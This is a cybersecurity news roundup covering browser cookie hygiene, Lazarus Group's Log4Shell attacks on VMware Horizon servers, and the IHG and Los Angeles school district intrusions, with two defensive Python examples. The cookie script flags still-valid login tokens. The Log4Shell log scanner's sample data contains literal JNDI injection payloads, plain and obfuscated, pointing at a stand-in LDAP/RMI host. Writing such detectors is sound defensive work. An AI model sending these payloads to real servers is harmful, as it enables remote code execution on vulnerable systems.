Follow ISA Cybersecurity on LinkedIn for the latest cybersecurity news
Weekly CyberTip: Clear your browser history and cookies
Whether you work on a desktop computer or a mobile device, almost all of your activity on the Internet is recorded by your browser. A history of websites visited, cached copies of pages and images, and even information you enter in online forms may be stored for future use. Cookies (small status or tracking files created during your visits to a website) may be left behind after you’ve closed your session; some of them hold session tokens, and anyone who copies those tokens can act as you on that site without knowing your password. These files can eventually degrade the performance of your browser, and they provide a trove of information if someone else gains access to your machine. Regularly clearing your browsing history and cookies is a good way to mitigate these risks. In most desktop browsers, pressing Ctrl+Shift+Del (Cmd+Shift+Delete on macOS) opens the dialog for clearing browsing data. Mobile devices are easy to clean up too: on Apple iOS, select Settings > Safari > Clear History and Website Data; on Android the exact path depends on the browser, but in Chrome it is Menu > Settings > Privacy and security > Clear browsing data. Note that clearing cookies signs you out of every site, so expect to log in again afterwards.
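To make the “left behind after you’ve closed your session” point concrete, here is an added Python example (not part of the original tip, and not code from ISA or any browser vendor) that inspects a cookie store and reports which cookies would still be valid if the browser were reopened, and which of them look like login tokens. It uses an in-memory SQLite table whose columns are a simplified subset of Firefox’s moz_cookies table, filled with constructed rows; the column subset, the fixed “now” timestamp and the auth-keyword list are assumptions for the example. A real cookies.sqlite should only be opened on a copy while the browser is closed, because the running browser keeps it locked.

```python
import sqlite3

# Simplified subset of Firefox's moz_cookies columns (assumed for this example;
# the real table has more columns and stores lastAccessed in microseconds).
SCHEMA = """
CREATE TABLE moz_cookies (
    id INTEGER PRIMARY KEY,
    host TEXT, name TEXT, value TEXT, path TEXT,
    expiry INTEGER,        -- seconds since the Unix epoch
    lastAccessed INTEGER,  -- seconds since the Unix epoch (simplified)
    isSecure INTEGER, isHttpOnly INTEGER
);
"""

# Fixed clock so the example is reproducible: 2022-09-09 00:00:00 UTC.
NOW = 1662681600

# Constructed sample rows; none of these hosts or values come from a real profile.
SAMPLE_COOKIES = [
    ("bank.example", "SESSIONID", "a1b2c3", "/", NOW + 30 * 86400, NOW - 600, 1, 1),
    ("mail.example", "auth_token", "eyJhbGciOi", "/", NOW + 365 * 86400, NOW - 3600, 1, 1),
    ("shop.example", "cart", "item=42", "/", NOW - 86400, NOW - 2 * 86400, 0, 0),  # expired
    ("ads.example", "_tracker", "uid=9f8e7d", "/", NOW + 2 * 365 * 86400, NOW - 60, 0, 0),
]

# Name fragments that usually indicate an authentication cookie (assumed heuristic).
AUTH_HINTS = ("sess", "auth", "token", "sid", "login")


def open_sample_db():
    """Build the in-memory store with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    conn.executemany(
        "INSERT INTO moz_cookies (host, name, value, path, expiry, lastAccessed, "
        "isSecure, isHttpOnly) VALUES (?, ?, ?, ?, ?, ?, ?, ?)",
        SAMPLE_COOKIES,
    )
    conn.commit()
    return conn


def live_cookies(conn, now=NOW):
    """Cookies the browser would still send to their site if reopened at `now`."""
    rows = conn.execute(
        "SELECT host, name, expiry, isSecure, isHttpOnly FROM moz_cookies "
        "WHERE expiry > ? ORDER BY host",
        (now,),
    ).fetchall()
    return [
        {
            "host": host,
            "name": name,
            "days_left": (expiry - now) // 86400,
            "looks_like_auth": any(k in name.lower() for k in AUTH_HINTS),
            "secure": bool(secure),
            "httponly": bool(httponly),
        }
        for host, name, expiry, secure, httponly in rows
    ]


def purge(conn, keep=()):
    """Delete every cookie except those for hosts in `keep`; return the count removed."""
    if keep:
        placeholders = ",".join("?" * len(keep))
        cur = conn.execute(
            f"DELETE FROM moz_cookies WHERE host NOT IN ({placeholders})", tuple(keep)
        )
    else:
        cur = conn.execute("DELETE FROM moz_cookies")
    conn.commit()
    return cur.rowcount


if __name__ == "__main__":
    db = open_sample_db()
    for c in live_cookies(db):
        flag = "AUTH" if c["looks_like_auth"] else "    "
        print(f"{flag} {c['host']:<14} {c['name']:<12} valid for {c['days_left']} more days")
    print(f"removed {purge(db)} cookies")
```

The inspection step is the useful part: on a profile that has been closed for days, it will typically show long-lived authentication cookies that are still valid, which is exactly what an attacker with file access would copy. The purge function is what “clear cookies” amounts to; use the browser’s own dialog on a live profile rather than editing the database directly.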
Cisco researchers show Log4j vulnerability still looms large
In a September 8 blog post, researchers from Cisco provide new details on how the threat actor Lazarus Group, which is linked to the North Korean government, has been exploiting the Log4j vulnerability to launch attacks against energy providers around the world, including those based in Canada, the United States, and Japan. While information about the attacks by Lazarus Group was published earlier this summer (e.g., by JPCERT/CC, Japan’s national CSIRT), the new report provides more technical details and deeper insights into the threats.
The group has been targeting Internet-exposed VMware Horizon servers, using the Log4j vulnerability (Log4Shell, CVE-2021-44228) as the initial access vector. Once inside the victim’s network, the gang deploys malware such as VSingle and YamaBot to establish persistence and expand its foothold.
“In this campaign, Lazarus was primarily targeting energy companies in Canada, the U.S. and Japan. The main goal of these attacks was likely to establish long-term access into victim networks to conduct espionage operations in support of North Korean government objectives,” according to the report. “This activity aligns with historical Lazarus intrusions targeting critical infrastructure and energy companies to establish long-term access to siphon off proprietary intellectual property.”
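As an added illustration of the initial-access vector described above (this is example code written for this page, not code from the Cisco report, from JPCERT/CC or from ISA), the following Python script shows how a defender might sweep web-server access logs in front of a Horizon instance for Log4Shell (CVE-2021-44228) probes. The point it demonstrates is that a plain string match on `${jndi:` misses most real probes: attackers URL-encode the payload or hide it in nested lookups such as `${lower:j}`, `${upper:n}` and the default-value form `${x:-j}`, so the scanner normalises those first. The log lines, IP addresses, field layout and the set of obfuscations handled are constructed for the example; real campaigns use further variants.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in Apache "combined" log format. The hosts, IPs and
# payloads are invented for this example, not taken from any real incident.
SAMPLE_LOG = """\
203.0.113.7 - - [08/Sep/2022:10:14:01 +0000] "GET /portal/webclient/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.8 - - [08/Sep/2022:10:14:02 +0000] "GET /portal/webclient/ HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.5:1389/a}"
203.0.113.9 - - [08/Sep/2022:10:14:03 +0000] "GET /portal/webclient/ HTTP/1.1" 200 512 "-" "${${lower:j}${upper:n}di:${::-l}dap://198.51.100.5:1389/a}"
203.0.113.10 - - [08/Sep/2022:10:14:04 +0000] "GET /portal/?q=%24%7Bjndi%3Armi%3A%2F%2F198.51.100.5%3A1099%2Fx%7D HTTP/1.1" 200 512 "-" "curl/7.68.0"
203.0.113.11 - - [08/Sep/2022:10:14:05 +0000] "GET /portal/webclient/ HTTP/1.1" 200 512 "-" "${${env:NaN:-j}ndi:${::-d}ns://198.51.100.5/x}"
"""

# Combined log format: ip ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Lookups that evaluate to a literal: ${lower:X} / ${upper:X} -> X, and
# ${anything:-X} (default-value syntax, including ${::-X}) -> X.
LOOKUP_RE = re.compile(
    r"\$\{(?:lower|upper):([^${}]*)\}|\$\{[^${}]*:-([^${}]*)\}",
    re.IGNORECASE,
)


def normalize(value):
    """Undo URL encoding and collapse literal-producing lookups until stable."""
    # Bounded decoding loop: probes are sometimes double-encoded.
    for _ in range(3):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    # Innermost lookups resolve first; repeat so nested layers unwind.
    prev = None
    while prev != value:
        prev = value
        value = LOOKUP_RE.sub(
            lambda m: m.group(1) if m.group(1) is not None else m.group(2), value
        )
    return value.lower()


def is_log4shell_probe(value):
    """True when the normalised text contains a JNDI lookup."""
    return "${jndi:" in normalize(value)


def scan(log_text):
    """Return one hit per log line whose request, referer or user-agent carries a probe."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        for field in ("request", "referer", "ua"):
            if is_log4shell_probe(m.group(field)):
                hits.append(
                    {"ip": m.group("ip"), "field": field, "normalized": normalize(m.group(field))}
                )
                break
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f"{hit['ip']:<14} {hit['field']:<8} {hit['normalized']}")
```

Run against the sample it flags four of the five lines; only the plain browser request passes. Two caveats a practitioner would add: a hit means a probe was attempted, not that it succeeded (confirm by looking for outbound LDAP/RMI/DNS connections from the Horizon host around the same timestamp), and the normaliser only handles the obfuscations listed, so treat it as a first filter rather than a complete signature.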
InterContinental Hotel Group operations “significantly disrupted” by cyber attack
On September 6, global hospitality company InterContinental Hotels Group PLC (IHG) issued a statement confirming “unauthorized activity” on its technology systems. In a disclosure to the London Stock Exchange the same day, the company advised that its booking channels and other applications had been “significantly disrupted,” though its hotels are still able to operate and to take reservations directly.
“IHG has implemented its response plans, is notifying relevant regulatory authorities and is working closely with its technology suppliers. External specialists have also been engaged to investigate the incident,” according to its disclosure notice.
According to an analysis by cyber forensics firm Hudson Rock, over 4,000 IHG users and 15 of its 325,000 employees may have been compromised in the attack. IHG has not acknowledged that report, and has made no further official statements since its LSE filing. Normal booking and website services appear to have resumed by September 8, though internal services may still be in recovery mode.
IHG operates over 6,000 hotels across 100 countries under 17 brands, including such well-known names as InterContinental, Regent, Holiday Inn, and Crowne Plaza.
Los Angeles Unified School District hit by cyber attack
In a September 6 news conference, Alberto Carvalho, the superintendent of the Los Angeles Unified School District (LAUSD), confirmed that the district had been hit by a cyber attack.
The attack was discovered around 10:30 p.m. (PT) on September 3 when IT staff first detected “unusual activity” over the Labour Day weekend. Carvalho said that malware had infected key network systems, necessitating password resets for all staff and students. The damage might have been even more severe, but LAUSD IT staff stopped the malware from propagating through the entire network.
“We basically shut down every one of our systems,” Carvalho said, noting that each one had been checked and all but one — the facilities system — had been restarted by September 5. That day, in a posting on their website, the district described a “significant disruption to our system’s infrastructure,” but was still able to proceed with school opening on September 6 as scheduled. Visitors to the website as late as September 12 still receive alerts advising: “We’re experiencing a service outage with multiple applications. Our team is currently working to restore the service. We apologize for any inconvenience.”
The attackers are suspected to be affiliated with the Vice Society ransomware group, which claims to have stolen 500 GB of data from the district’s networks. On September 6, U.S. federal authorities warned of potential ransomware attacks by the Vice Society, which has a reputation for targeting the education sector, particularly in the United States and the United Kingdom. No details have been disclosed regarding any ransom demand or payment, and the district has not yet confirmed that the Vice Society was involved.
LAUSD is the second largest school district in the U.S., with an enrolment of over 640,000 students from K to 12. The district catchments include Los Angeles proper, areas from 31 smaller municipalities, and some unincorporated sections of Los Angeles County.